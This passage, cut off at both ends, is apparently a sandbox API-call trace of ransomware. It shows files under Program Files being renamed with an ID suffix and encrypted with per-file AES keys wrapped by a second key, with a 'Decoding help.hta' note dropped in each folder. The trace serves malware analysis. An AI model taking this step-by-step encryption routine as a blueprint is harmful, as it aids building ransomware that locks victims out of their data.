pdwDataLen=0x1495fce4*=0x2c) returned 1 [0046.829] MapViewOfFile (hFileMappingObject=0x470, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe39c0) returned 0x5a90000 [0046.917] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1495fbe4*, pdwDataLen=0x1495fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1495fbe4*, pdwDataLen=0x1495fcf8*=0x100) returned 1 [0046.917] CryptEncrypt (in: hKey=0x671af0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5a90000, pdwDataLen=0x1495fce4*=0xe39c0, dwBufLen=0xe39c0 | out: pbData=0x5a90000*, pdwDataLen=0x1495fce4*=0xe39c0) returned 1 [0048.495] UnmapViewOfFile (lpBaseAddress=0x5a90000) returned 1 [0048.506] CloseHandle (hObject=0x470) returned 1 [0048.506] CryptDestroyKey (hKey=0x671af0) returned 1 [0048.506] CryptReleaseContext (hProv=0x3448500, dwFlags=0x0) returned 1 [0048.506] SetFilePointerEx (in: hFile=0x60c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.506] WriteFile (in: hFile=0x60c, lpBuffer=0x1495fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1495fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1495fbe4*, lpNumberOfBytesWritten=0x1495fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.381] WriteFile (in: hFile=0x60c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1495fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1495fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.381] CloseHandle (hObject=0x60c) returned 1 [0051.415] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.274] FindNextFileW (in: hFindFile=0x5a59f0, lpFindFileData=0x1495fd30 | out: lpFindFileData=0x1495fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x113b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeExtractFiles.dll", cAlternateFileName="ADOBEE~1.DLL")) returned 1 [0055.274] lstrcpyW (in: lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" [0055.274] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned 57 [0055.274] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta" [0055.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\decoding help.hta")) returned 0x1 [0055.274] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AdobeExtractFiles.dll") returned 1 [0055.275] lstrlenW (lpString="AdobeExtractFiles.dll") returned 21 [0055.275] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" [0055.275] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned 57 [0055.275] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\", lpString2="AdobeExtractFiles.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll" [0055.275] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll" [0055.275] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0055.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobeextractfiles.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobeextractfiles.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobeextractfiles.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0056.428] CreateFileMappingA (hFile=0x530, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x314 [0056.428] CryptAcquireContextA (in: phProv=0x1495fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1495fcec*=0x344a3d0) returned 1 [0059.855] CryptGenKey (in: hProv=0x344a3d0, Algid=0x6610, dwFlags=0x1, phKey=0x1495fce8 | out: phKey=0x1495fce8*=0x5a5b70) returned 1 [0059.855] CryptExportKey (in: hKey=0x5a5b70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1495fbe4, pdwDataLen=0x1495fce4 | out: pbData=0x1495fbe4*, pdwDataLen=0x1495fce4*=0x2c) returned 1 [0059.855] MapViewOfFile (hFileMappingObject=0x314, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x113a0) returned 0x550000 [0059.867] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1495fbe4*, pdwDataLen=0x1495fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1495fbe4*, pdwDataLen=0x1495fcf8*=0x100) returned 1 [0059.867] CryptEncrypt (in: hKey=0x5a5b70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000, pdwDataLen=0x1495fce4*=0x113a0, dwBufLen=0x113a0 | out: pbData=0x550000*, pdwDataLen=0x1495fce4*=0x113a0) returned 1 [0059.885] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0059.887] CloseHandle (hObject=0x314) returned 1 [0059.887] CryptDestroyKey (hKey=0x5a5b70) returned 1 [0059.887] CryptReleaseContext (hProv=0x344a3d0, dwFlags=0x0) returned 1 [0059.887] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.887] WriteFile (in: hFile=0x530, lpBuffer=0x1495fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1495fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1495fbe4*, lpNumberOfBytesWritten=0x1495fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.316] WriteFile (in: hFile=0x530, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1495fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1495fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.316] CloseHandle (hObject=0x530) returned 1 [0061.317] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.317] FindNextFileW (in: hFindFile=0x5a59f0, lpFindFileData=0x1495fd30 | out: lpFindFileData=0x1495fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x52ba8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReaderUpdater.exe", cAlternateFileName="READER~1.EXE")) returned 1 [0061.317] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" [0061.317] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned 57 [0061.317] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta" [0061.317] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\decoding help.hta")) returned 0x1 [0061.317] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ReaderUpdater.exe") returned -1 [0061.317] lstrlenW (lpString="ReaderUpdater.exe") returned 17 [0061.317] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*" [0061.317] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*.*") returned 57 [0061.317] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\", lpString2="ReaderUpdater.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe" [0061.317] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe" [0061.317] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0061.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\readerupdater.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\readerupdater.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.318] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\readerupdater.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0061.318] CreateFileMappingA (hFile=0x530, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x708 [0061.319] CryptAcquireContextA (phProv=0x1495fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 498 os_tid = 0xc0c [0045.651] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*.*", lpFindFileData=0x14a5fd30 | out: lpFindFileData=0x14a5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e36f0 [0045.651] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.651] FindNextFileW (in: hFindFile=0x5e36f0, lpFindFileData=0x14a5fd30 | out: lpFindFileData=0x14a5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.849] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.849] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.849] FindNextFileW (in: hFindFile=0x5e36f0, lpFindFileData=0x14a5fd30 | out: lpFindFileData=0x14a5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0a09f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xccb91a1, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xca0a09f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x6800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 1 [0048.849] lstrcpyW (in: lpString1=0x1115bbb0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*.*" [0048.849] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*.*") returned 67 [0048.849] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\Decoding help.hta" [0048.849] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\decoding help.hta")) returned 0xffffffff [0048.849] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0050.385] WriteFile (in: hFile=0x3f0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x14a5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x14a5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.541] CloseHandle (hObject=0x3f0) returned 1 [0053.667] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.625] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msinfo32.exe.mui") returned -1 [0057.625] lstrlenW (lpString="msinfo32.exe.mui") returned 16 [0057.625] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*.*" [0057.625] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*.*") returned 67 [0057.625] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\", lpString2="msinfo32.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" [0057.625] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" [0057.625] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0057.625] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.625] FindNextFileW (in: hFindFile=0x5e36f0, lpFindFileData=0x14a5fd30 | out: lpFindFileData=0x14a5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0a09f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xccb91a1, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xca0a09f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x6800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 0 [0057.625] FindClose (in: hFindFile=0x5e36f0 | out: hFindFile=0x5e36f0) returned 1 Thread: id = 499 os_tid = 0xc10 [0049.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*.*", lpFindFileData=0x2151fd30 | out: lpFindFileData=0x2151fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2df0 [0051.511] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0051.511] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0x2151fd30 | out: lpFindFileData=0x2151fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.511] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0051.511] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0051.511] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0x2151fd30 | out: lpFindFileData=0x2151fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe846a08f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe86330eb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe8659248, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0051.512] lstrcpyW (in: lpString1=0x25448548, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*.*" [0051.512] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*.*") returned 64 [0051.512] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\Decoding help.hta" [0051.512] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\decoding help.hta")) returned 0xffffffff [0051.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x288 [0053.663] WriteFile (in: hFile=0x288, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2151fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2151fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.459] CloseHandle (hObject=0x288) returned 1 [0057.578] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.578] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0057.578] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0057.578] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*.*" [0057.578] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*.*") returned 64 [0057.578] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" [0057.578] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" [0057.578] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0057.578] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 